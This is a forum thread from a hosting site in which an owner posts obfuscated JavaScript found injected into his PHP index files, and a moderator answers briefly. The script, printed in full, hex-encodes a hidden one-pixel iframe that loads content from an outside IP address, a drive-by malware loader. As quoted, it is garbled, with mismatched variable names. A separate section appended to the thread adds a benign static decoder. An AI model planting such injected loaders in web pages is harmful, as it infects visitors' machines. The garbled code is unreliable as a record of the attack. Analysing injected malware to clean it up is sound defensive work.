LINUX SUSE index files being injected with JavaScript code..

Discussion in 'Server Operation' started by pkfrizzlefry, Jul 20, 2008.

  1. pkfrizzlefry

    pkfrizzlefry New Member

    Apparently a lot of the index.php files on multiple sites I host on a SUSE box hosted on oneandone dedicated server are being injected with the javascript code I posted below...

    It opens up a frontpage office install on winxp when you go to the sites...

    Anyone know what the code below is doing and what the threat level is?

    I cleaned it up on some sites but left it on one for now as I don't know what it does

    Anyone know?

    infected site: mybalroom.com

    Greatly appreciate your time
    Pete
    :confused:

    ----code being injected
    <script language='javascript'>function cirpfjyua(lsolytfeqrzhg, nzndhq){var jyaghrpagphcgiuwrxh = "";for (var i = 0 ; i < lsolytfeqrzhg.length; ++i) xyloqymhhfkqdhgu += String.fromCharCode(nzncirpfjyuacirpfjyuacirpfjyuadhq ^(nzndhq ^ lsolytfeqrzhg.charCodeAt(i)));return xyloqymhhfkqdhgu;}var lsolytfeqrzhg = "\x20\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x27\x3c\x64\x69\x76\x20\x73\x74\x79\x6c\x65\x3d\x22\x76\x69\x73\x69\x62\x69\x6c\x69\x74\x79\x3a\x68\x69\x64\x64\x65\x6e\x22\x3e\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x38\x35\x2e\x31\x37\x2e\x31\x34\x33\x2e\x31\x35\x32\x2f\x22\x20\x77\x69\x64\x74\x68\x3d\x31\x20\x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\x3c\x2f\x64\x69\x76\x3e\x27\x29\x3b\x0d\x0a\x0d\x0a"; var xyloqymhhfkqdhgu = cirpfjyua(lsolytfeqrzhg, 121); eval(xyloqymhhfkqdhgu); </script>
    --------END---------
     
  2. falko

    falko Super Moderator Howtoforge Staff

    I don't know what the code is doing, but from what you write it sounds as if the site got hacked, so I'd remove that code as fast as possible and find out (-> logs) how they managed to inject it.
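
Added example, not part of the original thread or any poster's code: a static decoder for injected scripts of the shape posted above. The wrapper in such a script computes key ^ (key ^ c), which cancels out, so the \xNN string is the payload itself and can be read without running eval(). The sample input is constructed and uses the documentation address 192.0.2.1; all function names are made up for this sketch.

```javascript
// Added example: decode a hex-escaped, XOR-wrapped injected script statically,
// without calling eval(). SAMPLE is constructed (documentation address 192.0.2.1).
const SAMPLE = String.raw`<script language='javascript'>function f(s, k){var o = "";for (var i = 0; i < s.length; ++i) o += String.fromCharCode(k ^ (k ^ s.charCodeAt(i)));return o;}var s = "\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x27\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39\x32\x2e\x30\x2e\x32\x2e\x31\x2f\x22\x20\x77\x69\x64\x74\x68\x3d\x31\x20\x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\x27\x29\x3b"; eval(f(s, 121)); </script>`;

// Find double-quoted string literals that consist only of \xNN escapes.
function hexLiterals(source) {
  return [...source.matchAll(/"((?:\\x[0-9a-fA-F]{2})+)"/g)].map(m => m[1]);
}

// Convert \xNN escapes to characters by parsing them, never by evaluating them.
function unescapeHex(literal) {
  return literal.replace(/\\x([0-9a-fA-F]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Mirror of the wrapper's loop: key ^ (key ^ c) === c, so any key gives the input back.
function xorTwice(text, key) {
  return [...text]
    .map(c => String.fromCharCode(key ^ (key ^ c.charCodeAt(0))))
    .join('');
}

// Collect iframe targets from the decoded markup.
function iframeSrcs(decoded) {
  return [...decoded.matchAll(/<iframe[^>]*\ssrc=["']?([^"'\s>]+)/gi)].map(m => m[1]);
}

// Decode every hex literal in a file's contents and report what it would have written.
function analyze(source, key = 121) {
  return hexLiterals(source).map(literal => {
    const decoded = xorTwice(unescapeHex(literal), key);
    return { decoded, iframes: iframeSrcs(decoded) };
  });
}

for (const finding of analyze(SAMPLE)) {
  console.log('decoded payload:', JSON.stringify(finding.decoded));
  console.log('iframe targets :', finding.iframes.join(', ') || '(none)');
}
```

Run it with Node.js on a copy of an affected file's contents; the decoded text shows what the script would have written into the page, and the iframe address is something to search for in the other sites' files and in the logs.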
     
